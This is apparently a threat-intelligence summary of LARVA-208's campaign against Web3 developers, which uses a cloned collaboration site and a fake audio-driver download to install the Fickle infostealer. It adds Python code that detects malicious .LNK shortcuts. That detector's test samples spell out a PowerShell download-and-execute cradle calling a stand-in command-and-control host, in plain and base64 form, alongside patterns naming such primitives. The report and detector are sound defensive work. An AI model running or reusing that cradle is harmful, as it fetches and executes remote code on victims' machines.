LARVA-208, a threat group previously known for phishing IT staff via phone calls and emails, has launched a targeted campaign aimed at Web3 developers.
This operation goes beyond traditional email lures or malicious attachments and uses a convincing fake collaboration platform to trick victims into installing malware themselves.
The campaign revolves around Norlax AI, a clone of the legitimate AI workspace platform Teampilot.ai.
Developers are contacted with job offers or project invitations, then directed to Norlax to join a meeting. Once logged in, victims are prompted to resolve a fake audio issue by downloading an "audio driver." The installer delivers Fickle, an infostealer that quietly exfiltrates sensitive system and user data.
The payload itself is not technically elaborate; what makes the campaign effective is the delivery. LARVA-208 uses tools and environments developers are already familiar with and introduces malware through scenarios that seem routine and plausible.
Why It Matters: Developers in the Web3 space often maintain direct control over private keys, smart contracts, and deployment infrastructure, frequently without the protection of centralized IT policies. LARVA-208 exploits this by embedding malware into realistic workflows, such as job interviews and platform demos, delivered through convincingly cloned services. Because the victim downloads and runs the "driver" themselves after a live conversation, there is no malicious attachment or link for email security to inspect; the attack rests on the trust built during the interaction, placing sensitive systems within reach of well-prepared adversaries.

- Norlax AI is a Functional Clone of a Legitimate Platform: The fake site norlax.ai is nearly identical to teampilot.ai in appearance and behavior. Victims are given unique invitation codes and login credentials by the attacker, adding to the illusion of exclusivity and authenticity. The interaction feels legitimate enough to lower suspicion.
- Audio Error Prompt Delivers Malware: Once the victim logs in, they are told that their audio drivers are outdated or missing. A prompt links to audiorealtek.com, a domain imitating the audio chipset vendor Realtek, where a supposed Realtek HD Audio Driver can be downloaded. The installer looks legitimate but carries a PowerShell command embedded in a DLL; when run, that command retrieves the Fickle stealer from a command-and-control (C2) domain and installs it silently.
- Fickle Steals Detailed Host and Network Information: The malware collects system metadata, including device name, OS version, CPU architecture, installed programs, language settings, username, running processes, and IP-based location data. This information is sent to attacker-controlled servers, where it is indexed under a system referred to as SilentPrism.
- Victims Are Recruited Through Developer-Focused Channels: LARVA-208 reaches out on platforms such as X, Telegram, and Remote3. In some cases, the attackers post fake job listings. Interviews often begin over Google Meet, which builds trust. Later, the attacker shifts the session to Norlax to deliver the payload. This approach bypasses Remote3’s built-in safety recommendations and avoids detection by using real-time communication to stage the attack.
- Infrastructure Tied to Luminous Mantis via Bulletproof Hosting: The campaign uses several domains registered through FFv2, a bulletproof hosting provider linked to Luminous Mantis. These overlaps in hosting and domain registration practices suggest shared tooling or operational alignment between LARVA-208 and Luminous Mantis.
- Older Tactics Still in Use Alongside Platform Impersonation: In parallel with the Norlax delivery method, LARVA-208 has also continued to deploy .LNK shortcut files carrying PowerShell payloads. These shortcuts reference a legitimate Windows script and append the malicious command after an ampersand, the cmd.exe command separator, so the benign script runs first and the PowerShell stager runs afterward. The stager connects to the group's servers, downloads Fickle, and executes it.
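The .LNK technique in the last bullet can be checked mechanically. The following Python is an added example, not code from CATALYST or from the campaign: it parses the StringData section of a Windows shell link per the MS-SHLLINK format, splits the shortcut's arguments on unquoted cmd.exe `&` separators, and flags shortcuts where one segment runs a script under C:\Windows while another runs a PowerShell download-and-execute cradle, including one hidden behind `-EncodedCommand`. The sample shortcuts are constructed inside the block; the script name (slmgr.vbs), the cradle text and the host `c2.example.invalid` are assumptions, since the summary above names none of them.

```python
import base64
import re
import struct
import uuid

# MS-SHLLINK LinkFlags bits used here
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le

# A script shipped under C:\Windows that the shortcut uses as a benign-looking decoy
WINDOWS_SCRIPT = re.compile(r'[A-Za-z]:\\Windows\\[^\s"]*\.(?:vbs|js|wsf|bat|cmd|ps1)\b', re.I)
# PowerShell followed by a download-and-execute primitive in the same command segment
PS_CRADLE = re.compile(r"\bpowershell(?:\.exe)?\b.*?(?:DownloadString|DownloadFile|Invoke-WebRequest"
                       r"|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression)", re.I)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes the size field itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH), ("working_dir", HAS_WORKING_DIR),
                     ("arguments", HAS_ARGUMENTS), ("icon_location", HAS_ICON_LOCATION)):
        if flags & bit:
            count, off = struct.unpack_from("<H", data, off)[0], off + 2   # CountCharacters, no terminator
            width = 2 if flags & IS_UNICODE else 1
            fields[key] = data[off:off + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            off += count * width
    return fields

def split_chain(cmdline: str) -> list:
    """Split on '&' / '&&' outside double quotes, the way cmd.exe separates commands."""
    parts, cur, quoted, i = [], [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            quoted = not quoted
        if c == "&" and not quoted:
            parts.append("".join(cur).strip())
            cur = []
            if cmdline[i + 1:i + 2] == "&":
                i += 1
        else:
            cur.append(c)
        i += 1
    parts.append("".join(cur).strip())
    return [p for p in parts if p]

def expand_encoded(segment: str) -> str:
    """Append the decoded text of a -EncodedCommand payload (base64 of UTF-16LE) so patterns can see it."""
    m = ENCODED_CMD.search(segment)
    if not m:
        return segment
    try:
        return segment + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return segment

def assess_lnk(data: bytes) -> dict:
    """Flag a shortcut that chains a C:\\Windows script with a PowerShell download cradle via '&'."""
    segments = split_chain(parse_lnk(data).get("arguments", ""))
    decoys = [s for s in segments if WINDOWS_SCRIPT.search(s) and not PS_CRADLE.search(expand_encoded(s))]
    cradles = [s for s in segments if PS_CRADLE.search(expand_encoded(s))]
    return {"segments": segments, "decoy_scripts": decoys, "cradles": cradles,
            "suspicious": len(segments) > 1 and bool(decoys) and bool(cradles)}

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal shell link (no IDList/LinkInfo) for the samples below; real files carry more."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)

# Constructed samples; the script name, cradle text and host are assumptions, not indicators from the report.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/f')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLES = {
    "plain_script": build_lnk(r"..\..\Windows\System32\cmd.exe", r"/c C:\Windows\System32\slmgr.vbs /dli"),
    "chained_benign": build_lnk(r"..\..\Windows\System32\cmd.exe", r"/c C:\Windows\System32\slmgr.vbs /dli & exit"),
    "chained_cradle": build_lnk(r"..\..\Windows\System32\cmd.exe",
                                r'/c C:\Windows\System32\slmgr.vbs /dli & powershell -w hidden -nop -c "' + _CRADLE + '"'),
    "chained_encoded": build_lnk(r"..\..\Windows\System32\cmd.exe",
                                 r"/c C:\Windows\System32\slmgr.vbs /dli & powershell -w hidden -nop -enc " + _ENC),
}

if __name__ == "__main__":
    print({name: assess_lnk(blob)["suspicious"] for name, blob in SAMPLES.items()})
```

Running the block prints `True` for the two chained samples and `False` for the plain and the harmless chained one. Against real files, pass `open(path, "rb").read()` to `assess_lnk`; the parser skips the IDList and LinkInfo blocks that real shortcuts carry, and the decoded-command step is what keeps a `-enc` variant from slipping past the plain-text patterns.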
Go Deeper -> LARVA-208’s New Campaign Targets Web3 Developers – CATALYST